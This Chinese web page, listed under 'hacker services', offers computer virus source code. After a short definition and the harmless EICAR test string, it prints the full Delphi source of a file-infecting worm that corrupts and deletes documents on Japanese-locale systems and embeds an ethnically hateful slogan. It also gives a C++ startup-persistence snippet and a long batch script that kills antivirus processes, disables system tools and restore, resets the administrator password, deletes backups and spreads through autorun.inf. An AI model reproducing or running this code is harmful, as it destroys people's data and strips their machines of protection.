当前位置:首页 > 黑客业务 > 正文内容

程序病毒代码(简单的病毒编程代码)

hacker3年前 (2022-06-01)黑客业务125

本文导读目录:

计算机病毒通常是什么样的一段程序代码

计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。

计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。

电脑病毒代码

不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

熊猫烧香

ogram Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize = 82432; //病毒体的大小

IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

HeaderSize = 38912; //Upx压缩过病毒体的大小

IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

IconSize = $2E8; //PE文件主图标的大小--744字节

IconTail = IconOffset + IconSize; //PE文件主图标的尾部

ID = $44444444; //感染标记

//垃圾码,以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***';

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external 'Kernel32.dll'; //函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean = False; //日文操作系统标记

{ 判断是否为Win9x }

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result := False;

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True;

end;

{ 在流之间复制 }

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream := TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

{ 发带毒邮件 }

procedure SendMail;

begin

//哪位仁兄愿意完成之?

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try //出错则文件正在被使用,退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to $108 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //检查感染标记

SrcStream.Read(iID, 4);

if (iID = ID) or (SrcStream.Size 10240) then //太小的文件不感染

Infected := True;

finally

SrcStream.Free;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.Create;

try

aIcon := TIcon.Create;

try

//得到被感染文件的主图标(744字节),存入流

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID := $44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{ 将目标文件写入垃圾码后删除 }

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0); //去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

try

Size := GetFileSize(FileHandle, nil); //文件大小

i := 0;

Randomize;

Max := Random(15); //写入垃圾码的随机次数

if Max 5 then

Max := 5;

Mass := Size div Max; //每个间隔块的大小

Len := Length(Catchword);

while i Max do

begin

FileSeek(FileHandle, i * Mass, 0); //定位

//写入垃圾码,将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle); //关闭文件

end;

DeleteFile(PChar(FileName)); //删除之

except

end;

end;

{ 获得可写的驱动器列表 }

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65);

Str := D + ':';

DiskType := GetDriveType(PChar(Str));

//得到本地磁盘和 *** 盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D;

end;

end;

{ 遍历目录,感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (SearchRec.Attr '.') and

(SearchRec.Name '..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and

(SearchRec.Name '..') then

Result := 1 //不是根目录

else Result := 2; //是根目录

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件,将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings + '', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧!

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList + ':', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之?

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end

比较简单的C++病毒代码

最简单的病毒代码如下: #include "windows.h"

#include "stdio.h"

void main(int argc,char * argv[])

//printf("%s\n",argv[i]);

char copy[80];

sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);

system(copy); //将这个程序拷到开机启动文件夹下面

//char cmd[]="shutdown -r -t 0";//自动重起

char cmd[]="ping baidu.com";//将这个换成上面的,就是一开机就重起了!

system(cmd);

system("pause");

谁能解释下面简单的电脑病毒代码?

我帮你"翻译"一下代码的意思。

这是一段vbs代码:直到(除非)1等于2,否则就一直弹出一个写有"烦死你"的窗口,因为1永远不等于2,所以不断的弹窗。

这是VB的一个简单编程,但是代码却不怀好意。这段代码的意思是说,当双击运行这个程序的时候,执行以下代码:直到(除非)1等于2,否则隐藏这个软件的窗体,然后显示这个软件的窗体,然后调用系统的"calc.exe"程序,也就是调用系统自带的"计算器",因为1永远不等于2,所以这些步骤永远循环的执行下去。以现在的计算机来看,并不会"运行后马上死机",我们的计算机还不至于这么差劲,不过cpu会高涨,根据不同计算机的配置,时间范围从很快死机到数秒后死机不等。

批处理文件的病毒代码大全!

最强病毒!谨慎运行!此程序会将系统搞崩溃.

摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm  去掉里面的字哦

@echo off  

title You DEAD!!!!!!!  

set taskkill=s  

copy %0 %windir%\system32\cmd.bat  

attrib %windir%\system32\cmd.bat +r +s +h  

net stop sharedaccess nul  

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f nul  

%s% /im norton* /f nul  

%s% /im av* /f nul  

%s% /im fire* /f nul  

%s% /im anti* /f nul  

%s% /im spy* /f nul  

%s% /im bullguard /f nul  

%s% /im PersFw /f nul  

%s% /im KAV* /f nul  

%s% /im ZONEALARM /f nul  

%s% /im SAFEWEB /f nul  

%s% /im OUTPOST /f nul  

%s% /im nv* /f nul  

%s% /im nav* /f nul  

%s% /im F-* /f nul  

%s% /im ESAFE /f nul  

%s% /im cle /f nul  

%s% /im BLACKICE /f nul  

%s% /im def* /f nul  

%s% /im 360safe.exe /f nul  

net stop Shadow" "System" "Service  

set alldrive=d e f g h i j k l m n o p q r s t u v w x y z  

for %%a in (c %alldrive%) do del %%a:\360* /f /s /q nul  

for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q nul  

rem 修改注册表.......  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\  

Folder\Hidden\SHOWALL /v   

CheckedValue /t REG_DWORD /d 00000000 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoRun /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoRecentDocsMenu /t   

REG_DWORD /d 00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoDrives /t REG_DWORD /d   

4294967295 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   

Disableregistrytools /t   

REG_DWORD /d 00000002 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoNetHood /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V   

NoDesktop /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoClose /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoFind /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   

DisableTaskMgr /t REG_DWORD   

/d 00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoLogOff /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

NoSetTaskBar /t REG_DWORD   

/d 00000001 /f nul  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v   

DisableSR /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v   

DisableConfig /t REG_DWORD /d   

00000001 /f nul  

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   

RestrictRun /t REG_DWORD /d   

00000001 /f nul  

cls  

net user administrator 123456 nul  

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q nul  

echo @echo off d:\setup.bat  

echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新  

安装系统可以解决此问题  

!^.^ d:\setup.bat  

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动  

\a.bat d:\setup.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f d:\setup.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f d:\setup.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f d:\setup.bat  

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f   

d:\setup.bat  

echo [windows]  %windir%\win.ini  

echo run=d:\setup.bat C:\AUTOEXEC.BAT  %windir%\win.ini  

echo load=d:\setup.bat C:\AUTOEXEC.BAT  %windir%\win.ini  

echo [boot]  %windir%\system.ini  

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT  %windir%\system.ini  

echo [AutoRun] d:\autorun.inf  

echo Open=setup.bat d:\autorun.inf  

echo Open=system.bat d:\autorun.inf  

attrib d:\autorun.inf +r +s +h d:\setup.bat  

attrib d:\setup.bat +r +s +h d:\setup.bat  

start d:\setup.bat /min nul  

echo @echo off C:\AUTOEXEC.BAT  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f C:\AUTOEXEC.BAT  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f C:\AUTOEXEC.BAT  

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f C:\AUTOEXEC.BAT  

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min C:\AUTOEXEC.BAT  

copy %0 %systemroot%\windows.bat nul  

if not exist %windir%/system32/explorer.bat @echo off %windir%/system32/explorer.bat  

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min %  

windir%/system32/explorer.bat  

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min %  

windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

AUTOEXEC.BAT /t REG_SZ /d   

C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f %windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

setup.bat /t REG_SZ /d d:\setup.bat   

/f %windir%/system32/explorer.bat  

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   

explorer.bat /t REG_SZ /d %  

windir%/system32/explorer.bat/f %windir%/system32/explorer.bat  

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   

explorer.bat /t REG_SZ /d %  

windir%/system32/explorer.bat /f %windir%/system32/explorer.bat  

echo start %systemroot%\windows.bat /min %windir%/system32/explorer.bat  

attrib %windir%/system32/explorer.bat +r +s +h%  

attrib %systemroot%/windows.bat +r +s +h  

for %%c in (%alldrive%) do echo @echo off %%c:\system.bat  

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min %%c:\system.bat  

for %%c in (%alldrive%) do echo attrib system.bat +r +s +h %%c:\system.bat  

set drive=e f g h i j k l m n o p q r s t u v w x y z  

for %%c in (%drive%) do echo [AuroRun] %%c:\autorun.inf  

for %%c in (%drive%) do echo Open=system.bat %%c:\autorun.inf  

copy %0 d:\Program" "Files\run.bat  

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start   

d:\Program" "Files\run.bat /min   

%%c:\system.bat  

for %%c in (%alldrive%) do attrib autorun.inf +r +s +h %%c:\system.bat  

for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h nul  

for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h nul  

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat  

/min d:\setup.bat  

attrib d:\Program" "Files\run.bat +r +s +h nul  

del %0  

exit

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时在线接单网站发布,如需转载请注明出处。

本文链接:https://www.cn-sl.com/112793.html

分享给朋友:

“程序病毒代码(简单的病毒编程代码)” 的相关文章

日语导游证怎么考(全国导游资格证考试官网)

念要报名导游资历 测验 的小同伴 注重啦!文旅部说, 二0 二 一年天下 导游资历 测验 要开端 报名啦!成心背的小同伴 否于 七月 一 九日 九:00至 八月 二0日 一 七:00登录文旅部网站(https://www.mct.gov.cn/)报名。考熟需提接远期 一寸皂底免冠证件照片、身份证扫描...

长垣在哪里(长垣县多大)

 二0 二 一. 五. 二 六  二 三: 一 六 《外国印象圆志》 河北卷 少垣篇 先贤文明铸便文明基石 少垣一带晚正在秋春期间 就是 亮贤会聚之天,正在少垣郊区西南偏向 约五公里,有一座有余千人的小村落 ,名为私塾 岗村。它的名字,便起源 于一段贤者美谈 。 一日,孔子带着寡门生 途...

圣达菲怎么样(华泰汽车圣达菲怎么样)

  国产SUV再加新成员 新圣达菲卖 一0. 一 八- 一 二. 五 八万元   铁扇私主   揭橥 于   牛车网    二0 一 四. 一 一. 二0  一 五:0 二   华泰新圣达菲正在本年 的广州车铺邪式上市,新车异时拉没搭载 一. 五T汽油以及 二.0T柴油柴油二种动员 机的 ...

郑州疫情有多严重?郑州通报一密接者活动轨迹

陕西一须眉 劝酒被拒,连塞 三块枣糕致人灭亡 ,家眷 获赚 二 四万没原谅书 天天  三分钟,速览法制热门 消息  一 二月 二 四日礼拜 五,阴历 十一月两十一 ◇昔日 头条 郑州传递 一稀交者运动 轨迹 ▼ 上高滑动审查详情 闭于一位新冠肺炎亲密 打仗 者正在郑州市 运动 轨...

华流芒种是几月几号农历

芒种是两十四骨气 之一,年夜 野对付 两十四骨气 也曾经异常 熟习 了,然则 芒种是哪一地借没有是很清晰 ,本年 的芒种是阴历 六月 五日,这么 二0 二0年芒种是阴历 几月几号呢?交高去咱们便一路 相识 一高吧。    ...

618淘宝手机会降价吗

脚机是年夜 野一样平常 生涯 外必弗成 长的电子产物 了,不论是正在哪皆离没有谢脚机。 二0 二0年 六 一 八如今 曾经正在运动 时代 了,许多 小同伴 皆趁着 六 一 八运动 的时刻 换脚机,由于 确定 会有扣头 的,然则 念要购一款孬的脚机价钱 也没有会很廉价 ,只可正在运动 时代 看看会没有...

评论列表

美咩七凉
3年前 (2022-06-01)

dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明var TmpFile: string; Si: STA

辞眸北槐
3年前 (2022-06-02)

\Windows\CurrentVersion\Policies\Explorer /v   NoNetHood /t REG_DWORD /d   00000

泪灼俛就
3年前 (2022-06-01)

USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   Disableregistrytools /t   REG_DWORD /d 00000002 

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。